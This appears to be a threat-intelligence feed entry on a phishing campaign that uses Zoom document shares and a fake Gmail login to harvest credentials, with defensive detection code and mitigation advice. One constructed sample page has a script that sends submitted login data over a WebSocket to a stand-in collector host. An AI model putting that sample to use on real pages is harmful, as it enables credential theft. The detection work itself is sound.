
Look mom HR application, look mom no job - phishing using Zoom docs to harvest Gmail creds

Medium
Published: Wed Oct 08 2025 (10/08/2025, 13:03:55 UTC)
Source: Reddit NetSec

Description

A phishing campaign leverages Zoom's document sharing feature to establish initial trust with victims: the lure is a shared Zoom document link rather than a raw attacker URL. The link routes users through a fake bot protection page before presenting a Gmail-like login page that harvests credentials. Entered credentials are transmitted to the attacker over a WebSocket and validated on the backend as they arrive, so the attacker learns immediately whether a stolen password works. The technique exploits user trust in Zoom and mimics the legitimate Gmail login to increase success rates; it relies on no software vulnerability, only on user interaction. The campaign is currently observed with minimal discussion and no known widespread exploitation. It is rated medium risk because of its credential compromise potential. European organizations using Gmail and Zoom are at risk, especially those with remote workforces relying on these platforms and those in countries with high Zoom and Gmail adoption. A compromised account gives the attacker mailbox access and a foothold for data breaches and further attacks. Mitigation requires user awareness, enforced multi-factor authentication, and monitoring for suspicious login attempts.

AI-Powered Analysis

Last updated: 10/08/2025, 13:11:49 UTC

Technical Analysis

This phishing campaign exploits the trust users place in Zoom's document sharing feature by initiating the attack through a shared Zoom document link. Victims are first forced through a fake 'bot protection' gate, a social engineering step that mimics the legitimate anti-bot checks users are accustomed to seeing and lowers suspicion before the credential prompt appears. Users then encounter a counterfeit Gmail login page crafted to closely resemble the authentic interface. When a user submits Gmail credentials, the page transmits them to the attacker over a WebSocket connection, which gives the attacker the data in real time rather than in a batch. The attacker's backend validates the credentials on receipt, confirming that they work and enabling immediate use; a defender who only rotates passwords after a delayed report will usually be too late. The attack does not rely on software vulnerabilities but on deception and user interaction, making it a classic phishing technique enhanced by a trusted platform as the delivery vector. The campaign is currently documented on Reddit's NetSec community with minimal discussion and no evidence of widespread exploitation or automated mass attacks. The absence of affected software versions or patches reflects that this is a social engineering threat rather than a technical vulnerability. The medium severity reflects the potential for credential compromise leading to unauthorized access to Gmail accounts, which can result in data breaches, identity theft, and follow-on attacks within organizations, for example internal phishing sent from the compromised mailbox. The use of Zoom as the initial trust vector is notable given its widespread adoption for remote collaboration, which increases the likelihood that users encounter such phishing attempts and treat them as routine.
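The page-level indicators described above (a Google-branded password prompt served from a host other than accounts.google.com, a 'bot protection' interstitial, and an in-page WebSocket to a third host) can be turned into a triage heuristic for URL sandboxes or web-gateway review queues. The following is an added example written for this page, not the original author's code or any phishing kit's code; the sample HTML, the landing host docs-share.example, and the collector host collector.example are constructed stand-ins.

```python
"""Heuristic triage of a landing page for the Zoom-doc -> bot gate -> fake Gmail
login pattern.  Added example, not the original post's code.  Sample HTML and
hosts (docs-share.example, collector.example) are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Google sign-in (and therefore every legitimate Gmail password prompt) is
# served from accounts.google.com; a Google-branded password field anywhere
# else is a fraud by definition.
GOOGLE_SIGNIN_HOSTS = {"accounts.google.com"}

BRAND_RE = re.compile(r"\b(gmail|google)\b", re.I)
BOTGATE_RE = re.compile(r"(verif\w* (that )?you are (a )?human|bot protection|checking your browser)", re.I)
WS_RE = re.compile(r"""new\s+WebSocket\s*\(\s*['"](wss?://[^'"]+)['"]""")


class _PageCollector(HTMLParser):
    """Extract the few features the heuristics need: title, visible text,
    inline script bodies, form actions and the number of password fields."""

    def __init__(self):
        super().__init__()
        self.title, self.text, self.scripts, self.form_actions = "", [], [], []
        self.password_inputs = 0
        self._in_title = self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        elif self._in_script:
            self.scripts.append(data)
        else:
            self.text.append(data)


def triage_page(url, html):
    """Return {'host', 'findings', 'verdict'} with verdict 'phish', 'review' or 'benign'."""
    host = (urlparse(url).hostname or "").lower()
    page = _PageCollector()
    page.feed(html)
    visible = page.title + " " + " ".join(page.text)
    strong, weak = [], []

    # Strong indicator 1: Google-branded password form off accounts.google.com.
    if page.password_inputs and host not in GOOGLE_SIGNIN_HOSTS and BRAND_RE.search(visible):
        strong.append(f"Google-branded password form served from {host}")

    # Strong indicator 2: the form itself posts credentials to another host.
    for action in page.form_actions:
        target = urlparse(action).hostname
        if target and target.lower() != host:
            strong.append(f"credential form posts to foreign host {target}")

    # Strong indicator 3: a page carrying a password field opens a WebSocket,
    # the real-time exfiltration channel described in the analysis.
    if page.password_inputs:
        for ws_url in WS_RE.findall("\n".join(page.scripts)):
            strong.append(f"page with password field opens WebSocket to {urlparse(ws_url).hostname or '?'}")

    # Weak indicator: 'bot protection' wording on a non-Google host (the interstitial).
    if BOTGATE_RE.search(visible) and host not in GOOGLE_SIGNIN_HOSTS:
        weak.append("bot-protection interstitial text on a non-Google host")

    verdict = "phish" if strong else ("review" if weak else "benign")
    return {"host": host, "findings": strong + weak, "verdict": verdict}


# Constructed sample pages (not captured from the campaign).
PHISH_URL = "https://docs-share.example/view"
PHISH_HTML = """<html><head><title>Gmail - Sign in</title></head><body>
<div id="gate">Bot protection: verifying you are human...</div>
<form id="login" action="#">
  <input type="email" name="identifier"><input type="password" name="password">
  <button type="submit">Next</button>
</form>
<script>
  // constructed stand-in for an exfil channel; collector.example is hypothetical
  const ws = new WebSocket("wss://collector.example/ws");
  document.getElementById("login").onsubmit = (e) => {
    e.preventDefault();
    ws.send(JSON.stringify(Object.fromEntries(new FormData(e.target))));
  };
</script></body></html>"""

LEGIT_URL = "https://accounts.google.com/v3/signin/identifier"
LEGIT_HTML = """<html><head><title>Sign in - Google Accounts</title></head><body>
<form action="/v3/signin/challenge"><input type="email"><input type="password">
<button>Next</button></form></body></html>"""

if __name__ == "__main__":
    for u, h in ((PHISH_URL, PHISH_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(triage_page(u, h))
```

The heuristics are deliberately simple and lean on one fact that does not change: a Google password prompt is only ever served from accounts.google.com. A kit that loads its exfiltration script from an external file rather than inline would escape the WebSocket check, so in a sandbox the scripts should be fetched and fed through the same regex, and a WebSocket opened at form submission time should be caught at the network layer as well.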

Potential Impact

For European organizations, this phishing campaign poses a significant risk primarily through the compromise of Gmail credentials, which are often used for corporate email and access to Google Workspace services. Unauthorized access to these accounts can lead to data exfiltration, exposure of sensitive information, and further phishing or malware distribution within the organization. The use of Zoom as the initial vector is particularly impactful given the high adoption rates of Zoom for remote work across Europe, increasing the attack surface. Compromised credentials can also facilitate business email compromise (BEC) attacks, financial fraud, and reputational damage. Organizations relying heavily on Google services without enforced multi-factor authentication (MFA) are especially vulnerable. The campaign could disrupt business operations, lead to regulatory non-compliance under GDPR due to data breaches, and incur financial losses. Additionally, the psychological impact on employees and trust erosion in collaboration tools may affect productivity and security culture.

Mitigation Recommendations

To mitigate this threat, European organizations should implement targeted user awareness training focused on recognizing phishing attempts that exploit trusted platforms like Zoom; the concrete rule to teach is that a Google password is only ever typed on accounts.google.com, and a Google-branded login prompt on any other host is fraudulent regardless of how the link arrived. Enforce multi-factor authentication (MFA) on all Google Workspace accounts so that a harvested password alone does not grant access; because the kit validates credentials in real time, prefer phishing-resistant factors (FIDO2 security keys or passkeys) over one-time codes where possible, since those factors do not release a reusable secret to a look-alike page. Deploy email and web gateway filters to detect and block phishing URLs, especially pages that mimic legitimate services. Monitor login activity for anomalous behavior such as successful password logins from IP addresses, locations or devices a user has not used before, and treat a hit as a likely credential compromise: revoke sessions and reset the password rather than waiting for further evidence. Web-proxy and endpoint controls can be tuned to flag pages that carry a password field and open a WebSocket to a host unrelated to the page origin, the exfiltration pattern observed here. Regularly review and update incident response plans to include phishing scenarios involving collaboration tools. Report phishing URLs through Zoom and Google abuse channels so malicious content is taken down promptly. Finally, publish an enforcing DMARC policy (domain-based message authentication, reporting, and conformance) to reduce spoofing of your own domains; note that DMARC does not stop lures delivered through a legitimate Zoom document share, so it complements rather than replaces the controls above.
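One way to implement the login-monitoring recommendation, as an added example that is not part of the original post or of any Google tooling: flag successful password logins from source IPs a user has never logged in from before. The record shape (id.time, actor.email, ipAddress, events[].name, and a login_type parameter) is assumed to follow Google Workspace Reports API login-activity records; the events, users and IP addresses (documentation ranges) are constructed for the example.

```python
"""Flag successful password logins from IPs a user has never used before, over
Google Workspace login-audit style records.  Added example, not the original
post's code.  Record shape is assumed to follow the Reports API 'login'
application; the events and IPs (documentation ranges) are constructed."""
from datetime import datetime, timedelta, timezone


def _ts(s):
    """RFC 3339 timestamp -> aware datetime (older Pythons need +00:00 rather than Z)."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def _param(event, name):
    """Value of a named parameter on one event, or None."""
    return next((p.get("value") for p in event.get("parameters", []) if p.get("name") == name), None)


def _successful_password_logins(activities):
    """Yield (time, user, ip) for every login_success that used a Google password."""
    for act in activities:
        for ev in act.get("events", []):
            if ev.get("name") == "login_success" and _param(ev, "login_type") == "google_password":
                yield _ts(act["id"]["time"]), act["actor"]["email"].lower(), act.get("ipAddress", "")


def flag_new_ip_logins(activities, now, recent_hours=24):
    """Baseline = each user's source IPs from successful password logins older
    than recent_hours.  Returns the recent password logins whose source IP is
    absent from that user's baseline, oldest first."""
    cutoff = now - timedelta(hours=recent_hours)
    baseline, recent = {}, []
    for when, user, ip in _successful_password_logins(activities):
        if when < cutoff:
            baseline.setdefault(user, set()).add(ip)
        else:
            recent.append((when, user, ip))
    return [{"time": when.isoformat(), "user": user, "ip": ip}
            for when, user, ip in sorted(recent) if ip not in baseline.get(user, set())]


def _login(time, email, ip, name="login_success", login_type="google_password"):
    """Build one constructed activity record in the assumed shape."""
    return {"id": {"time": time, "applicationName": "login"},
            "actor": {"email": email}, "ipAddress": ip,
            "events": [{"type": "login", "name": name,
                        "parameters": [{"name": "login_type", "value": login_type}]}]}


# Constructed sample: alice's password is used from a never-seen IP at 03:30.
SAMPLE_ACTIVITIES = [
    _login("2025-10-01T08:00:00Z", "alice@example.com", "203.0.113.10"),
    _login("2025-10-03T09:12:00Z", "alice@example.com", "203.0.113.10"),
    _login("2025-10-02T10:00:00Z", "bob@example.com", "192.0.2.5"),
    _login("2025-10-08T03:30:00Z", "alice@example.com", "198.51.100.77"),  # harvested password, new IP
    _login("2025-10-08T04:00:00Z", "alice@example.com", "198.51.100.77", name="login_failure"),
    _login("2025-10-08T08:00:00Z", "alice@example.com", "203.0.113.10"),   # alice herself, known IP
    _login("2025-10-08T09:00:00Z", "bob@example.com", "192.0.2.5"),
]
NOW = datetime(2025, 10, 8, 13, 0, tzinfo=timezone.utc)

if __name__ == "__main__":
    for hit in flag_new_ip_logins(SAMPLE_ACTIVITIES, NOW):
        print(f"ALERT {hit['time']} {hit['user']} password login from new IP {hit['ip']}")
```

A per-IP baseline is noisy for mobile and travelling users; in production key the baseline on ASN or country instead of the literal address, and pair the alert with automatic session revocation and a forced password reset, since the analysis above shows the attacker validates and can use the credentials within moments of the victim submitting them.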


Technical Details

Source Type
reddit
Subreddit
netsec
Reddit Score
1
Discussion Level
minimal
Content Source
reddit_link_post
Domain
blog.himanshuanand.com
Newsworthiness Assessment
{"score":31.1,"reasons":["external_link","newsworthy_keywords:rce,campaign,phishing campaign","non_newsworthy_keywords:job","established_author","very_recent"],"isNewsworthy":true,"foundNewsworthy":["rce","campaign","phishing campaign"],"foundNonNewsworthy":["job"]}
Has External Source
true
Trusted Domain
false

Threat ID: 68e663069e2ffba8db3c0645

Added to database: 10/8/2025, 1:11:34 PM

Last enriched: 10/8/2025, 1:11:49 PM

Last updated: 10/8/2025, 11:06:51 PM

Views: 6
